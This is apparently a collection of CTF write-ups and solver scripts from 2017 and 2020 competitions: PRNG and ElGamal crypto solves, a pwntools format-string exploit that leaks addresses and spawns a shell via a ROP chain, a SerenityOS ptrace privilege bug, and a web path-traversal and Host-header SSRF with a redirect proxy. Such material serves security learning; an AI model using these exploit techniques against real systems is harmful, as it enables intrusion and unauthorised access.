48 |     Logger.add(username + "/session/ephemeral/prekey/requested/public/" + localSeedStorage);
49 |     Logger.add(username + "/session/ephemeral/prekey/requested/private/", localCurve25519KeyPair.getPrivateKey());
50 |     return localSeedStorage;
51 |   }
52 |   
53 |   public void decryptData(ECKey paramECKey, Participant paramParticipant)
54 |   {
55 |     Logger.add(username + "/msg/rcv/" + username + "/enc/" + paramECKey);
56 |     getCreateSession(paramParticipant).decrypt(paramECKey, (byte[])seedByteArrayStorage.get(Long.valueOf(paramECKey.getSeed())));
57 |     seedByteArrayStorage.remove(Long.valueOf(paramECKey.getSeed()));
58 |   }
59 |   
60 |   public void encryptData(StringStorage paramStringStorage, Participant otherParticipant)
61 |   {
62 |     otherParticipant.a(getCreateSession(otherParticipant).encryptData(paramStringStorage, otherParticipant.GenerateKeyPairStore()), this);
63 |   }
64 |   
65 |   public boolean equals(Object paramObject)
66 |   {
67 |     if ((paramObject instanceof Participant)) {
68 |       return Arrays.equals(((Participant)paramObject).getCurve25519PublicKey(), getCurve25519PublicKey());
69 |     }
70 |     return false;
71 |   }
72 |   
73 |   public byte[] getCurve25519PublicKey()
74 |   {
75 |     return keyPair.getPublicKey();
76 |   }
77 | }
78 | 


--------------------------------------------------------------------------------
/2020/twctf/xor-shift-enc/multiply_and_check.sage:
--------------------------------------------------------------------------------
  1 | 
  2 | try:
  3 |   from tqdm import tqdm
  4 | except ImportError:
  5 |   def tqdm(it, *args, **kwargs):
  6 |     return it
  7 | 
  8 | NBITS = 64
  9 | NSTATE = 64
 10 | 
 11 | SZ = NBITS * NSTATE
 12 | 
 13 | 
 14 | def dbg(bitvec):
 15 |     for i in range(NSTATE):
 16 |         vals = bitvec[NBITS * i : NBITS * (i + 1)]
 17 |         print("".join([str(x) for x in vals]))
 18 | 
 19 | 
 20 | def num_to_bitvec(x, bits=NBITS):
 21 |     return [((x >> i) & 1) for i in list(range(bits))[::-1]]
 22 | 
 23 | 
 24 | def state_to_bitvec(l):
 25 |     res = []
 26 |     for el in l:
 27 |         res += num_to_bitvec(el, NBITS)
 28 |     return res
 29 | 
 30 | import json
 31 | 
 32 | unrolled = matrix.identity(SZ, GF(2))
 33 | 
 34 | for i in tqdm(range(NSTATE)):
 35 |     with open("step" + str(i) + ".json") as f:
 36 |         data = json.load(f)
 37 |         stepmatrix = matrix(GF(2), SZ, data, sparse=False)
 38 |         unrolled = stepmatrix * unrolled
 39 | 
 40 | print("dumping to json...")
 41 | with open("unrolled.json", "w") as f:
 42 |     json.dump([list([int(x) for x in x]) for x in list(unrolled)], f)
 43 | 
 44 | print("unrolled:")
 45 | print(unrolled)
 46 | s = []
 47 | p = 0
 48 | 
 49 | 
 50 | def init():
 51 |     global s, p
 52 |     s = [i for i in range(0, NSTATE)]
 53 |     p = 0
 54 |     return
 55 | 
 56 | 
 57 | def randgen():
 58 |     global s, p
 59 |     pn = (p + 1) % NSTATE
 60 |     res = (s[p] + s[pn]) & ((1 << NBITS) - 1)
 61 |     s1 = s[pn] ^^ ((s[pn] << 3) & ((1 << NBITS) - 1))
 62 |     s[pn] = (s1 ^^ s[p] ^^ (s1 >> 13) ^^ (s[p] >> 37)) & ((1 << NBITS) - 1)
 63 |     p = pn
 64 |     return res
 65 | 
 66 | 
 67 | init()
 68 | import json
 69 | 
 70 | init()
 71 | for i in range(100):
 72 |     for _ in range(NSTATE):
 73 |         randgen()
 74 | print(p, s)
 75 | sanity_start = state_to_bitvec(s)
 76 | for _ in range(NSTATE):
 77 |     randgen()
 78 | sanity_check = state_to_bitvec(s)
 79 | print(s)
 80 | 
 81 | 
 82 | sanity_test = unrolled * vector(sanity_start)
 83 | 
 84 | 
 85 | print("sanity_start:")
 86 | dbg(sanity_start)
 87 | 
 88 | print("sanity check:")
 89 | dbg(sanity_check)
 90 | 
 91 | print("sanity_test:")
 92 | dbg(sanity_test)
 93 | 
 94 | print("sanity check matches", sanity_check == list(sanity_test))
 95 | 
 96 | print("step-by-step check:")
 97 | 
 98 | init()
 99 | for i in tqdm(range(100)):
100 |     for i in range(NSTATE):
101 |         with open("step" + str(i) + ".json") as f:
102 |             data = json.load(f)
103 |             stepmatrix = matrix(GF(2), SZ, data, sparse=False)
104 |         state = state_to_bitvec(s)
105 |         actual = list(stepmatrix * vector(state))
106 |         randgen()
107 |         expected = state_to_bitvec(s)
108 | 
109 |         if expected != actual:
110 |             print()
111 |             print("step", i)
112 |             print(stepmatrix)
113 | 
114 |             print("state")
115 |             dbg(state)
116 | 
117 |             print("expected")
118 |             dbg(expected)
119 | 
120 |             print("actual")
121 |             dbg(actual)
122 | 
123 |             print("matches", expected == actual)
124 |             assert expected == actual


--------------------------------------------------------------------------------
/2020/twctf/blind-shot/script.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python3
  2 | from pwn import *
  3 | 
  4 | exe = context.binary = ELF("blindshot")
  5 | libc = ELF("libc-2.31.so") if args.REMOTE else exe.libc
  6 | 
  7 | if not args.REMOTE:
  8 |     #context.aslr = False
  9 |     pass
 10 | 
 11 | 
 12 | r = None
 13 | def connect(fresh=True, local=False):
 14 |     global r
 15 |     if r is not None:
 16 |         if fresh:
 17 |             r.close()
 18 |         else:
 19 |             return
 20 |     r = remote("pwn01.chal.ctf.westerns.tokyo", 12463) if args.REMOTE and not local else exe.process()
 21 | 
 22 | # make loop
 23 | STAGE0 = "".join([
 24 |     f"%0c%0c%0c%0c%*c",      # next: 7
 25 |     f"%{0xfedc - 9}c",       # next: 8
 26 |     f"%0c" * 3,              # next: 11
 27 |     f"%hhn",                 # next: 12
 28 |     f"%0c" * 6,              # next: 18
 29 |     f"%hn",
 30 |     f"%1$*15$c" * 15,
 31 |     f"%{15 * 6 + 0x0e}c",
 32 |     f"%46$hhn",
 33 | ])
 34 | 
 35 | # enable output by returning to main with eax=0x101 (fd will be al = 0x1 for next call)
 36 | STAGE1 = "".join([
 37 |     f"%{0x7e}c%46$hhn",
 38 |     f"%{0x101-0x7e}c",
 39 | ])
 40 | 
 41 | # leak all the things
 42 | STAGE2 = "".join([
 43 |     # set ret to loop
 44 |     f"%{0x8e}c%46$hhn",
 45 | 
 46 |     "LEAKS:",
 47 | 
 48 |     # leak stack
 49 |     "%5$p,",
 50 | 
 51 |     # leak heap
 52 |     "%9$p,",
 53 | 
 54 |     # leak pie base
 55 |     "%12$p,",
 56 | 
 57 |     # leak libc
 58 |     "%16$p,",
 59 | ])
 60 | 
 61 | for _ in range(20):
 62 |     connect()
 63 |     try:
 64 |         r.sendlineafter("> ", STAGE0)
 65 |         r.recvline_contains("done")
 66 |         r.recvuntil("> ")
 67 |         break
 68 |     except EOFError:
 69 |         pass
 70 | 
 71 | r.sendline(STAGE1)
 72 | r.recvline_contains("done")
 73 | 
 74 | # do the leaks
 75 | r.sendlineafter("> ", STAGE2)
 76 | r.recvuntil("LEAKS:")
 77 | stack_ptr, heap_ptr, pie_ptr, libc_ptr = [int(x.decode(), 16) for x in r.recvline().split(b",")[:-1]]
 78 | info(f"{stack_ptr = :#x} {heap_ptr = :#x} {pie_ptr = :#x} {libc_ptr = :#x}")
 79 | 
 80 | rbp = stack_ptr - 0x128
 81 | libc.address = libc_ptr - libc.symbols.__libc_start_main - 243
 82 | info(f"libc base: {libc.address:#x}")
 83 | 
 84 | rop = ROP(libc)
 85 | rop.call('system', (next(libc.search(b"sh\0")), ))
 86 | chain = rop.chain()
 87 | 
 88 | # align stack
 89 | count = len(chain) // 8
 90 | RET = rop.search(move=0).address
 91 | chain = p64(RET) * 3 + chain
 92 | 
 93 | def make_write(addr, byte):
 94 |     assert addr & ~0xffff == stack_ptr & ~0xffff
 95 |     return "".join([
 96 |         # set ret to loop
 97 |         f"%{0x8e}c%46$hhn",
 98 | 
 99 |         # set the write pointer
100 |         f"%{(addr & 0xffff) - 0x8e}c%5$hn",
101 | 
102 |         # return
103 |         "\n",
104 | 
105 |         # set ret to loop
106 |         f"%{0x8e}c%46$hhn",
107 | 
108 |         # write byte
109 |         f"%{(byte - 0x8e) % 0x100}c%48$hhn" + "\n",
110 |     ])
111 | 
112 | main_ret = rbp + 0x28
113 | 
114 | # for i in range(0, len(chain), 8):
115 | #     chunk = chain[i:i+8]
116 | #     assert len(payload) < 200
117 | #     r.sendlineafter("> ", payload)
118 | # print(len(payload))
119 | r.send("".join(make_write(main_ret + i, v) for i, v in enumerate(chain)))
120 | 
121 | r.interactive()
122 | 


--------------------------------------------------------------------------------
/2020/twctf/the_melancholy_of_alice/writeup.md:
--------------------------------------------------------------------------------
 1 | # The Melancholy of Alice
 2 | Category: Crypto
 3 | 
 4 | Solves: 36, Score: 242
 5 | 
 6 | > Carol "That's classified information."
 7 | 
 8 | Three attached files: [ciphertext.txt](./ciphertext.txt) and [publickey.txt](./publickey.txt) and [encrypt.py](./encrypt.py)
 9 | 
10 | 
11 | ## Solution
12 | Given that we have a ciphertext, a publickey and an encrypt file, it is immediately obvious that we have somehow break an asymmetric cipher. Closer investigation of the encryption funciton reveals, that it uses the El-Gamal cipher. This can easily be recognized because the ciphertext consists of a pair of large numbers.
13 | 
14 | Verifying the implementation against Wikipedia shows that everything largely checks out. The generation of the secret key between 2 and `q = (p - 1) // 2` is weird, as it will make it one bit shorter than it could be. No attack against this was found though. However, the suggested key-generation method is different. Usually `p` is chosen such that `q = (p - 1) // 2` is prime, which is NOT checked here. `p` is simply a random large prime. This means that the multiplicative group which El-Gamal operates on has multiple largish sub-groups, a weakness we can exploit!
15 | 
16 | Important for the following attack to work, is the fact that one flag-byte is encrypted at a time.
17 | 
18 | Factoring `p-1` reveals some small factors: `2,3,5,19,5710354319`.
19 | 
20 | Now consider some ciphertext `(c1,c2)` with
21 | ``` 
22 |   r  = random session key
23 |   x  = secret key
24 |   g  = generator
25 |   m  = message
26 |   c1 = g**r
27 |   c2 = m * g**(r*x)
28 | 
29 |   let n be the order of g, so that g**n == 1
30 |   observe that
31 |   c1**n == g ** r ** n
32 |         == (g ** n) ** r
33 |         == 1
34 |   c2**n == m**n * g**(r*x*n) 
35 |         == g**n**(r*x) 
36 |         == m**n
37 | ```
38 | This allows us to verify a guess of `n` against c1. We know that `n` always is a product of the factors of `p-1`, so there are limited choices. A guess of `m` can then be verified against `c2`. Unfortunately, this yields all `m` which lie in the same subgroup as each other. To make the attack more reliable, pairs of plain- and ciphertexts are considered as follows: 
39 | ```
40 |  Input: Two ciphertexts, (c1a, c2a) and (c1b, c2b), which use random-keys of (ra and rb) corrospondingly.
41 | 
42 |  Let f be a "random" factor. Then
43 |    c2a*(c2b**f) == ma*mb * g**(x*(ra+f*rb))
44 |  Now define n to be the order of g**(ra+f*rb).
45 | 
46 | This n can again be experimentally determined, by checking with c1:
47 |    c1a * c1b**f == g**(ra+f*rb)
48 | So test possible values for the generator n, until
49 |    (c1a * c1b**f) ** n == 1
50 | 
51 | By having f as a tunable parameter, an optimal subgroup can be chosen.
52 | 
53 | Now, test possible values for pairs of ma,mb so that
54 |    (ma * mb**f) ** n == (c2a * c2b**f) ** n
55 | ```
56 | 
57 | Doing this "smart" reveals the only for possible values for `ma` and `mb`. The result is still not unique, but enough to easily guess the remaining chars.
58 | 
59 | 
60 | Fully commented solution script is attached: [solve.py](./solve.py)
61 | 
62 | ### Flag
63 | `TWCTF{8d560108444cc360374ef54433d218e9_for_the_first_time_in_9_years!}`
64 | 
65 | what exactly the "hash" in the first part is, or why 9 years is relevant is unknown.


--------------------------------------------------------------------------------
/2020/twctf/xor-shift-enc/solve.sage:
--------------------------------------------------------------------------------
  1 | 
  2 | try:
  3 |   from tqdm import tqdm
  4 | except ImportError:
  5 |   def tqdm(it, *args, **kwargs):
  6 |     return it
  7 | 
  8 | NBITS = 64
  9 | NSTATE = 64
 10 | 
 11 | SZ = NBITS * NSTATE
 12 | 
 13 | 
 14 | def dbg(bitvec):
 15 |     for i in range(NSTATE):
 16 |         vals = bitvec[NBITS * i : NBITS * (i + 1)]
 17 |         print("".join([str(x) for x in vals]))
 18 | 
 19 | 
 20 | def num_to_bitvec(x, bits=NBITS):
 21 |     return [((x >> i) & 1) for i in list(range(bits))[::-1]]
 22 | 
 23 | def bitvec_to_num(bv):
 24 |     return int(''.join([str(x) for x in bv]), 2)
 25 | 
 26 | def state_to_bitvec(l):
 27 |     res = []
 28 |     for el in l:
 29 |         res += num_to_bitvec(el, NBITS)
 30 |     return res
 31 | 
 32 | def bitvec_to_state(l):
 33 |     res = []
 34 |     for i in range(NSTATE):
 35 |         res.append(bitvec_to_num(l[i*NBITS:(i+1)*NBITS]))
 36 |     return res
 37 | 
 38 | import json
 39 | with open("unrolled.json") as f:
 40 |     data = json.load(f)
 41 |     unrolled = matrix(GF(2), SZ, data, sparse=False)
 42 | 
 43 | print("got matrix")
 44 | 
 45 | s = []
 46 | p = 0
 47 | ctr = 0
 48 | 
 49 | 
 50 | def init():
 51 |     global s, p, ctr
 52 |     s = [i for i in range(0, NSTATE)]
 53 |     p = 0
 54 |     ctr = 0
 55 |     return
 56 | 
 57 | 
 58 | def randgen():
 59 |     global s, p, ctr
 60 |     pn = (p + 1) % NSTATE
 61 |     res = (s[p] + s[pn]) & ((1 << NBITS) - 1)
 62 |     s1 = s[pn] ^^ ((s[pn] << 3) & ((1 << NBITS) - 1))
 63 |     s[pn] = (s1 ^^ s[p] ^^ (s1 >> 13) ^^ (s[p] >> 37)) & ((1 << NBITS) - 1)
 64 |     p = pn
 65 |     ctr += 1
 66 |     return res
 67 | 
 68 | def jump(to):
 69 |     global s, ctr
 70 |     to += ctr
 71 |     init()
 72 |     state = state_to_bitvec(s)
 73 |     to -= 1
 74 |     ops = to // NSTATE
 75 |     left = to - ops * NSTATE +1
 76 |     # print("jump: ops =", ops, "left =", left)
 77 |     res = (unrolled ^ ops) * vector(state)
 78 |     s = bitvec_to_state(res)
 79 |     for _ in range(left):
 80 |         res = randgen()
 81 |     ctr = to+1
 82 |     return res
 83 | 
 84 | def check_jump():
 85 |     init()
 86 |     jump(10000)
 87 |     assert randgen() == 7239098760540678124
 88 | 
 89 |     init()
 90 |     jump(100000)
 91 |     assert randgen() == 17366362210940280642
 92 | 
 93 |     init()
 94 |     jump(1000000)
 95 |     assert randgen() == 13353821705405689004
 96 | 
 97 |     init()
 98 |     jump(10000000)
 99 |     assert randgen() == 1441702120537313559
100 | 
101 |     init()
102 |     for a in range(31337):randgen()
103 |     for a in range(1234567):randgen()
104 |     buf = randgen()
105 |     for a in range(7890123):randgen()
106 |     buf2 = randgen()
107 |     init()
108 |     jump(31337+1234567)
109 |     print (buf == randgen())  
110 |     jump(7890123)
111 |     print (buf2 == randgen())
112 | 
113 | check_jump()
114 | 
115 | init()
116 | for a in range(31337):randgen()
117 | 
118 | 
119 | enc = open("enc.dat", "rb").read()
120 | 
121 | # Expected: b"Oh, you can read me, right? OK. I'll give you the"
122 | 
123 | flag = b""
124 | for x in range(256):
125 |     buf = randgen()
126 |     sh = x//2
127 |     if sh > 64:
128 |         sh = 64
129 |     mask = (1 << sh) - 1
130 |     print(buf, sh, hex(mask))
131 |     buf &= mask
132 |     print("jump", hex(buf))
133 |     jump(buf)
134 |     c = bytes([(randgen() & 0xff) ^^ enc[x]])
135 |     flag += c
136 |     print(flag)
137 | print(flag)


--------------------------------------------------------------------------------
/2017/files/rev250/SrcCleaned/securemessenger/EncryptedSession.java:
--------------------------------------------------------------------------------
 1 | package messenger.hackit2017.helper.securemessenger;
 2 | 
 3 | import javax.crypto.Cipher;
 4 | import javax.crypto.spec.IvParameterSpec;
 5 | import javax.crypto.spec.SecretKeySpec;
 6 | import messenger.hackit2017.helper.securemessenger.xy.a;
 7 | import org.whispersystems.curve25519.Curve25519;
 8 | import org.whispersystems.curve25519.Curve25519KeyPair;
 9 | 
10 | public class EncryptedSession
11 | {
12 |   private Participant participant1;
13 |   private byte[] firstAgreement;
14 |   private Participant participant2;
15 |   private long shiftCounter;
16 |   
17 |   public EncryptedSession(Participant paramParticipant1, Participant paramParticipant2, byte[] privateKey)
18 |   {
19 |     participant1 = paramParticipant1;
20 |     participant2 = paramParticipant2;
21 |     firstAgreement = Curve25519.get("best").getAgreement(paramParticipant2.getCurve25519PublicKey(), privateKey);
22 |     shiftCounter = 0L;
23 |     Logger.add(participant2 + "/session/est/base/", firstAgreement);
24 |   }
25 |   
26 |   private byte[] getIVShifted(long shiftCounter)
27 |   {
28 |     byte[] arrayOfByte = firstAgreement;
29 |     int i = 0;
30 |     while (i < paramLong)
31 |     {
32 |       arrayOfByte = xy.a(3).a(arrayOfByte, "h4ck1t{RotationFlagInfo}".getBytes(), 32);
33 |       i += 1;
34 |     }
35 |     return arrayOfByte;
36 |   }
37 |   
38 |   private Cipher getCipherInstance()
39 |   {
40 |     return Cipher.getInstance("AES/CBC/PKCS5Padding");
41 |   }
42 |   
43 |   public ECKey encryptData(StringStorage paramStringStorage, PublicKeyStorage paramPublicKeyStorage)
44 |   {
45 |     Curve25519 curve25519Obj = Curve25519.get("best");
46 |     Curve25519KeyPair localCurve25519KeyPair = curve25519Obj.generateKeyPair();
47 |     byte[] agreement = ((Curve25519)curve25519Obj).calculateAgreement(paramPublicKeyStorage.getMSGPubKey(), localCurve25519KeyPair.getPrivateKey());
48 |     Logger.add(participant1.username + "/session/ephemeral/shared/", arrayOfByte);
49 |     shiftCounter += 1L;
50 |     byte[] keyBytes = sha256Hmac(getIVShifted(shiftCounter), "WhisperSystems".getBytes(), 16);
51 |     arrayOfByte = sha256Hmac(agreement, "WhisperSystems".getBytes(), 16);
52 |     Cipher localCipher = getCipherInstance();
53 |     localCipher.init(1, new SecretKeySpec(keyBytes, "AES"), new IvParameterSpec(arrayOfByte));
54 |     //  doFinal(byte[] input)
55 |     return new ECKey(localCipher.doFinal(paramStringStorage.getStoredValue().getBytes()), shiftCounter, paramPublicKeyStorage.getSeed(), localCurve25519KeyPair.getPublicKey());
56 |   }
57 |   
58 |   public StringStorage decrypt(ECKey paramECKey, byte[] privateKeyParam)
59 |   {
60 |     byte[] arrayOfByte = Curve25519.get("best").calculateAgreement(paramECKey.getPublicKey(), privateKeyParam);
61 |     byte[] AESKEY = sha256Hmac(getIVShifted(paramECKey.getStoredMessageCounter()), "WhisperSystems".getBytes(), 16);
62 |     arrayOfByte = sha256Hmac(arrayOfByte, "WhisperSystems".getBytes(), 16);
63 |     Cipher localCipher = getCipherInstance();
64 |     localCipher.init(2, new SecretKeySpec(AESKEY, "AES"), new IvParameterSpec(arrayOfByte));
65 |     return new StringStorage(new String(localCipher.doFinal(paramECKey.getEncryptedData())));
66 |   }
67 |   
68 |   public boolean equals(Object paramObject)
69 |   {
70 |     return ((paramObject instanceof EncryptedSession)) && (participant1.equals(participant1)) && (participant2.equals(participant2));
71 |   }
72 | }
73 | 


--------------------------------------------------------------------------------
/2020/twctf/mask/mask.md:
--------------------------------------------------------------------------------
  1 | # Mask
  2 | 
  3 | In this challenge we got a list of ipv4 address and mask pairs:
  4 | 
  5 | ```
  6 | 192.168.55.86/255.255.255.0
  7 | 192.168.80.198/255.255.255.128
  8 | 192.168.1.228/255.255.255.128
  9 | 192.168.90.68/255.255.254.0
 10 | 192.168.8.214/255.255.255.128
 11 | 192.168.5.197/255.255.255.128
 12 | 192.168.71.90/255.255.255.0
 13 | 192.168.62.55/255.255.255.192
 14 | 192.168.78.209/255.255.255.128
 15 | 192.168.76.216/255.255.255.128
 16 | 192.168.91.202/255.255.255.128
 17 | 192.168.93.108/255.255.255.0
 18 | 192.168.74.76/255.255.254.0
 19 | 192.168.10.88/255.255.254.0
 20 | 192.168.82.236/255.255.255.128
 21 | 192.168.13.246/255.255.255.128
 22 | 192.168.99.228/255.255.255.128
 23 | 192.168.68.83/255.255.252.0
 24 | 192.168.23.113/255.255.255.192
 25 | 192.168.52.113/255.255.255.192
 26 | 192.168.69.99/255.255.255.0
 27 | 192.168.19.114/255.255.255.192
 28 | 192.168.53.236/255.255.255.128
 29 | 192.168.90.117/255.255.254.0
 30 | 192.168.35.90/255.255.255.0
 31 | 192.168.91.121/255.255.255.0
 32 | 192.168.48.49/255.255.255.192
 33 | 192.168.27.104/255.255.255.0
 34 | 192.168.98.204/255.255.255.128
 35 | 192.168.93.87/255.255.255.0
 36 | 192.168.44.113/255.255.255.192
 37 | 192.168.40.104/255.255.248.0
 38 | 192.168.25.227/255.255.255.128
 39 | 192.168.57.50/255.255.255.192
 40 | 192.168.97.115/255.255.255.0
 41 | 192.168.30.47/255.255.255.192
 42 | 192.168.10.102/255.255.254.0
 43 | 192.168.51.209/255.255.255.128
 44 | 192.168.82.125/255.255.255.192
 45 | 192.168.72.125/255.255.255.192
 46 | ```
 47 | 
 48 | At a first glance it looks like for each pair, the fourth byte of the address is ascii if it's masked of with the mask. The following python script does exactly that:
 49 | 
 50 | ```python
 51 | s = '''192.168.55.86/255.255.255.0
 52 | 192.168.80.198/255.255.255.128
 53 | 192.168.1.228/255.255.255.128
 54 | 192.168.90.68/255.255.254.0
 55 | 192.168.8.214/255.255.255.128
 56 | 192.168.5.197/255.255.255.128
 57 | 192.168.71.90/255.255.255.0
 58 | 192.168.62.55/255.255.255.192
 59 | 192.168.78.209/255.255.255.128
 60 | 192.168.76.216/255.255.255.128
 61 | 192.168.91.202/255.255.255.128
 62 | 192.168.93.108/255.255.255.0
 63 | 192.168.74.76/255.255.254.0
 64 | 192.168.10.88/255.255.254.0
 65 | 192.168.82.236/255.255.255.128
 66 | 192.168.13.246/255.255.255.128
 67 | 192.168.99.228/255.255.255.128
 68 | 192.168.68.83/255.255.252.0
 69 | 192.168.23.113/255.255.255.192
 70 | 192.168.52.113/255.255.255.192
 71 | 192.168.69.99/255.255.255.0
 72 | 192.168.19.114/255.255.255.192
 73 | 192.168.53.236/255.255.255.128
 74 | 192.168.90.117/255.255.254.0
 75 | 192.168.35.90/255.255.255.0
 76 | 192.168.91.121/255.255.255.0
 77 | 192.168.48.49/255.255.255.192
 78 | 192.168.27.104/255.255.255.0
 79 | 192.168.98.204/255.255.255.128
 80 | 192.168.93.87/255.255.255.0
 81 | 192.168.44.113/255.255.255.192
 82 | 192.168.40.104/255.255.248.0
 83 | 192.168.25.227/255.255.255.128
 84 | 192.168.57.50/255.255.255.192
 85 | 192.168.97.115/255.255.255.0
 86 | 192.168.30.47/255.255.255.192
 87 | 192.168.10.102/255.255.254.0
 88 | 192.168.51.209/255.255.255.128
 89 | 192.168.82.125/255.255.255.192
 90 | 192.168.72.125/255.255.255.192'''
 91 | 
 92 | def parse_ip(s):
 93 |     return [int(i) for i in s.split('.')]
 94 | 
 95 | pairs = [[parse_ip(ip) for ip in line.split('/')] for line in s.split()]
 96 | 
 97 | result = b''
 98 | for ip, mask in pairs:
 99 |     result += bytes([ip[3] & ~mask[3]])
100 | print(result)
101 | ```
102 | 
103 | This yields the base64 string `VFdDVEZ7QXJlLXlvdS11c2luZy1hLW1hc2s/fQ==`, which decodes to the flag: `TWCTF{Are-you-using-a-mask?}`


--------------------------------------------------------------------------------
/2020/hxpctf/wisdom2/writeup.md:
--------------------------------------------------------------------------------
 1 | # wisdom2
 2 | Category: zahjebischte, pwn
 3 | 
 4 | Solves: 1
 5 | Points: 1000
 6 | 
 7 | # Description
 8 | [Oops, I did it again.](https://2019.ctf.link/internal/challenge/1fef0346-a1de-4aa4-8df9-2d18229c6dbb/) :^)
 9 | 
10 | This is commit # 4232874270015d940a2ba62c113bcf12986a2151 with the attached patch applied. Flag is in /dev/hdb.
11 | 
12 | Note that the setup of this task is perhaps a bit shaky: If you don’t get a shell prompt within a few seconds after solving the proof of work, something is wrong. Each connection has a time limit of 10 minutes; you may contact us in case this causes problems for you.
13 | 
14 | # Files
15 | [wisdom2-c46f03732e9dceef.tar.xz](https://2020.ctf.link/assets/files/wisdom2-c46f03732e9dceef.tar.xz)
16 | 
17 | # Solution
18 | ## Vulnerability
19 | The goal of this task was to find a vulneraility in the latest release of [SerenityOS](http://serenityos.org) in order to read the flag from /dev/hdb. After looking through the code for a while I noticed a vulnerability in the ptrace implementation:
20 | When setting the registers of a thread by calling ptrace(PT\_SETREGS, pid, &regs, 0), eventually the following code is reached (in [Kernel/Ptrace.cpp](https://github.com/SerenityOS/serenity/blob/2dfe5751f35d0067747c6615bf139871cc105fa6/Kernel/Ptrace.cpp#L175)):
21 | ```C++
22 | void copy_ptrace_registers_into_kernel_registers(RegisterState& kernel_regs, const PtraceRegisters& ptrace_regs)
23 | {
24 |     kernel_regs.eax = ptrace_regs.eax;
25 |     kernel_regs.ecx = ptrace_regs.ecx;
26 |     kernel_regs.edx = ptrace_regs.edx;
27 |     kernel_regs.ebx = ptrace_regs.ebx;
28 |     kernel_regs.esp = ptrace_regs.esp;
29 |     kernel_regs.ebp = ptrace_regs.ebp;
30 |     kernel_regs.esi = ptrace_regs.esi;
31 |     kernel_regs.edi = ptrace_regs.edi;
32 |     kernel_regs.eip = ptrace_regs.eip;
33 |     kernel_regs.eflags = ptrace_regs.eflags;
34 | }
35 | ```
36 | kernel\_regs are the register contents of the ptrace'd process, while ptrace\_regs are the passed-in registers. Note that ptrace\_regs is not checked at all. Can you spot the vulnerability?
37 | 
38 | If not, maybe [this](https://en.wikipedia.org/wiki/FLAGS_register) will help you.
39 | 
40 | The vulnerability is that eflags can be set to arbitrary values. For example, it is possible to set the IOPL bits (bits 12/13) to one, therefore allowing access to I/O Ports (and the interrupt flag) in Ring 3 (userspace).
41 | 
42 | ## Exploitation
43 | There are multiple ways to exploit this vulnerability, but the easiest one is to set IOPL to 3 and then write (or copy ;) an ATA driver to read the flag directly from the IDE drive (using ATA PIO mode). Note that it is also possible to gain root privileges by writing to the main drive (just overwrite a setuid binary or change the owner/mode of your own binary).  
44 | Fortunately, simple ATA PIO drivers already exist and I decided to just use [this one](https://github.com/dhavalhirdhav/LearnOS/blob/fe764387c9f01bf67937adac13daace909e4093e/drivers/ata/ata.c).  
45 | The exploit can be found [here](https://github.com/allesctf/writeups/blob/master/2020/hxpctf/wisdom2/exploit.c).
46 | 
47 | ## Fix
48 | I recommend to always clear the IOPL bits and to always set the interrupt flag. If the nested task flag is not used in SerenityOS, it should also be cleared.  
49 | Also note that the same vulnerability is present in [sigreturn](https://github.com/SerenityOS/serenity/blob/2dfe5751f35d0067747c6615bf139871cc105fa6/Kernel/Syscalls/sigaction.cpp#L112).
50 | 
51 | ## Flag
52 | hxp{alL3\_j4Hr3\_w1eD3r\_k0MmT\_d3R\_r0oT\_eXpLO1t|http://serenityos.org/bounty}
53 | 


--------------------------------------------------------------------------------
/2020/twctf/angular_of_the_universe/writeup.md:
--------------------------------------------------------------------------------
  1 | # Angular of the Universe
  2 | Category: Web
  3 | 
  4 | Flag1: Solves: 39, Score: 139  
  5 | Flag2: Solves: 34, Score: 149
  6 | 
  7 | > You know, everything has the angular.
  8 | A bread, you, me and even the universe.
  9 | Do you know the answer?
 10 | 
 11 | [http://universe.chal.ctf.westerns.tokyo](http://universe.chal.ctf.westerns.tokyo)
 12 | 
 13 | 
 14 | ## Solution
 15 | For the first flag, we needed to bypass the nginx `location` directive:
 16 | ```conf
 17 | location /debug {
 18 |     # IP address restriction.
 19 |     # TODO: add allowed IP addresses here
 20 |     allow 127.0.0.1;
 21 |     deny all;
 22 |   }
 23 | ```
 24 | And after that the one in the express-server:
 25 | ```ts
 26 | if (process.env.FLAG && req.path.includes('debug')) {
 27 |       return res.status(500).send('debug page is disabled in production env')
 28 |     }
 29 | ```
 30 | 
 31 | We bypassed both checks by constructing a url with `//` because these characters seem to stop the route matching mechanism of angular/express and tell nginx that we are not entering `/debug` by traversing back with several `..`. So for now our exploit url is: `http://universe.chal.ctf.westerns.tokyo/debug/answer//../../a`
 32 | 
 33 | Luckily, the express request matchers seems to decode url-encoded characters before matching, so we can just substitute `d` with `%64` and bypass the includes.
 34 | 
 35 | When executing `curl --path-as-is -s http://universe.chal.ctf.westerns.tokyo/%64ebug/answer//../../a`, the flag can be found between several html-Tags.
 36 | 
 37 | For the second of the two flags we need to bypass our request ip, because the express server checks it before sending the flag:
 38 | ```ts
 39 | server.get('/api/true-answer', (req, res) => {
 40 |     console.log(req.ips)
 41 |     if (req.ip.match(/127\.0\.0\.1/)) {
 42 |       res.json(`hello admin, this is true answer: ${process.env.FLAG2}`)
 43 |     } else {
 44 |       res.status(500).send('Access restricted!')
 45 |     }
 46 |   });
 47 | ```
 48 | 
 49 | We solved this by changing the Host-Header in our Request, because Angular parses it as the Host for internal fetch Requests:
 50 | ```
 51 | renderOptions.url =
 52 |       renderOptions.url || `${req.protocol}://${(req.get('host') || '')}${req.originalUrl}`;
 53 | ```
 54 | 
 55 | With this we can exploit a fetch call on the debug Page:
 56 | ```
 57 | this.service.getAnswer().subscribe((answer: string) => {
 58 |       this.answer = answer
 59 |     })
 60 | ```
 61 | 
 62 | By excuting curl again pointing the host to our server running a Proxy script, we get the flag: `curl --path-as-is -s http://universe.chal.ctf.westerns.tokyo/%64ebug/answer//../../a -H "Host: example.com"`
 63 | 
 64 | 
 65 | ## Proxy Server
 66 | ```python
 67 | from http.server import BaseHTTPRequestHandler, HTTPServer
 68 | import logging
 69 | 
 70 | class S(BaseHTTPRequestHandler):
 71 |     def _set_response(self):
 72 |         self.send_response(301)
 73 |         self.send_header('Location', 'http://127.0.0.1/api/true-answer')
 74 |         self.end_headers()
 75 | 
 76 |     def do_GET(self):
 77 |         logging.info("GET request,\nPath: %s\nHeaders:\n%s\n", str(self.path), str(self.headers))
 78 |         self._set_response()
 79 | 
 80 | def run(server_class=HTTPServer, handler_class=S, port=8080):
 81 |     logging.basicConfig(level=logging.INFO)
 82 |     server_address = ('', port)
 83 |     httpd = server_class(server_address, handler_class)
 84 |     logging.info('Starting httpd...\n')
 85 |     try:
 86 |         httpd.serve_forever()
